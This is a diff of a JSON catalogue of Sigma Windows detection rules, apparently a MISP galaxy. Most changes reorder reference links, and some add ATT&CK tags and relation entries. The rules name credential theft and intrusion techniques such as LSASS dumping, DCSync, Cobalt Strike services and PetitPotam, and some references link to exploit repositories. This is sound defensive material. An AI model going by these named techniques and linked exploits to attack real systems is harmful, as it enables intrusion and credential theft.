"https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -8460,8 +8655,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ @@ -8561,8 +8756,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://adsecurity.org/?p=2053", + "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" ], "tags": [ 
@@ -8672,8 +8867,37 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1027", + "attack.t1105", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", "value": "Password Protected ZIP File Opened (Suspicious Filenames)" }, @@ -8690,8 +8914,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" ], "tags": [ 
@@ -8758,8 +8982,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ @@ -8792,9 +9016,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" ], "tags": [ @@ -8827,9 +9051,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://adsecurity.org/?p=3466", "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", - "https://adsecurity.org/?p=3466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ 
@@ -8862,9 +9086,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1581300963650187264?",
- "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/",
 "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html",
+ "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/",
+ "https://twitter.com/SBousseaden/status/1581300963650187264?",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml"
 ],
 "tags": [
@@ -8932,9 +9156,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/webcasts/119395",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.sans.org/webcasts/119395",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml"
 ],
 "tags": [
@@ -9020,8 +9244,8 @@
 "refs": [
 "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
 "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
- "https://twitter.com/gentilkiwi/status/1003236624925413376",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
+ "https://twitter.com/gentilkiwi/status/1003236624925413376",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml"
 ],
 "tags": [
@@ -9055,8 +9279,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625",
 "https://twitter.com/SBousseaden/status/1101431884540710913",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml"
 ],
 "tags": [
@@ -9296,8 +9520,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
 "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
+ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
 "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml"
 ],
@@ -9334,8 +9558,21 @@
 "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.lateral_movement",
+ "attack.t1550"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b",
 "value": "Outgoing Logon with New Credentials"
 },
@@ -9352,8 +9589,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
 "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
+ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_krbrelayup.yml"
 ],
 "tags": [
@@ -9377,8 +9614,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
 "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml"
 ],
 "tags": [
@@ -9513,14 +9750,26 @@
 "logsource.product": "windows",
 "refs": [
 "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b237c54b-0f15-4612-a819-44b735e0de27",
 "value": "A Security-Enabled Global Group Was Deleted"
 },
@@ -9605,15 +9854,27 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
 "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629",
 "value": "A Member Was Removed From a Security-Enabled Global Group"
 },
@@ -9734,8 +9995,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
 "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml"
 ],
 "tags": [
@@ -9819,15 +10080,27 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
 "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e",
 "value": "A Member Was Added to a Security-Enabled Global Group"
 },
@@ -9960,8 +10233,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://goo.gl/PsqrhT",
 "https://twitter.com/JohnLaTwC/status/1004895028995477505",
+ "https://goo.gl/PsqrhT",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
 ],
 "tags": [
@@ -10077,11 +10350,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/FlemmingRiis/status/1217147415482060800",
+ "https://twitter.com/DidierStevens/status/1217533958096924676",
 "https://twitter.com/VM_vivisector/status/1217190929330655232",
 "https://nullsec.us/windows-event-log-audit-cve/",
- "https://twitter.com/DidierStevens/status/1217533958096924676",
 "https://www.youtube.com/watch?v=ebmW42YYveI",
- "https://twitter.com/FlemmingRiis/status/1217147415482060800",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml"
 ],
 "tags": [
@@ -10300,9 +10573,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55",
 "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml"
 ],
 "tags": [
@@ -10335,8 +10608,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/",
 "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
+ "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msexchange_control_panel/win_vul_cve_2020_0688.yml"
 ],
 "tags": [
@@ -10404,8 +10677,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
- "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
+ "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml"
 ],
 "tags": [
@@ -10599,8 +10872,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml"
 ],
 "tags": [
@@ -10728,9 +11001,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
 "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml"
 ],
 "tags": [
@@ -10909,9 +11182,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml"
 ],
 "tags": [
@@ -10934,9 +11207,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml"
 ],
 "tags": [
@@ -10959,9 +11232,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml"
 ],
 "tags": [
@@ -10984,10 +11257,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
- "https://twitter.com/SBousseaden/status/1483810148602814466",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://twitter.com/SBousseaden/status/1483810148602814466",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml"
 ],
 "tags": [
@@ -11010,9 +11283,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml"
 ],
 "tags": [
@@ -11035,9 +11308,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml"
 ],
 "tags": [
@@ -11060,9 +11333,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml"
 ],
 "tags": [
@@ -11120,9 +11393,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml"
 ],
 "tags": [
@@ -11155,9 +11428,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml"
 ],
 "tags": [
@@ -11181,8 +11454,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/KevTheHermit/status/1410203844064301056",
- "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/afwu/PrintNightmare",
+ "https://github.com/hhlxf/PrintNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml"
 ],
 "tags": [
@@ -11238,11 +11511,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
- "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
 "https://winaero.com/enable-openssh-server-windows-10/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
 "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
 "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
 ],
 "tags": [
@@ -11275,9 +11548,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml",
 "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers",
 "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
+ "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml"
 ],
 "tags": [
@@ -11504,9 +11777,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346",
 "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
 "Internal Research",
+ "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml"
 ],
 "tags": [
@@ -11662,8 +11935,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml"
 ],
 "tags": [
@@ -11763,8 +12036,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
 "https://twitter.com/malmoeb/status/1535142803075960832",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml"
 ],
 "tags": [
@@ -11937,9 +12210,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
- "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml"
 ],
 "tags": [
@@ -12073,9 +12346,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
 "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
 "https://twitter.com/gentilkiwi/status/861641945944391680",
- "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml"
 ],
 "tags": [
@@ -12296,9 +12569,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/jonasLyk/status/1347900440000811010",
 "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
 "https://twitter.com/wdormann/status/1347958161609809921",
- "https://twitter.com/jonasLyk/status/1347900440000811010",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml"
 ],
 "tags": [
@@ -12515,8 +12788,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml"
 ],
 "tags": [
@@ -12982,9 +13255,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/webcasts/119395",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://www.sans.org/webcasts/119395",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml"
 ],
 "tags": [
@@ -13220,8 +13493,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
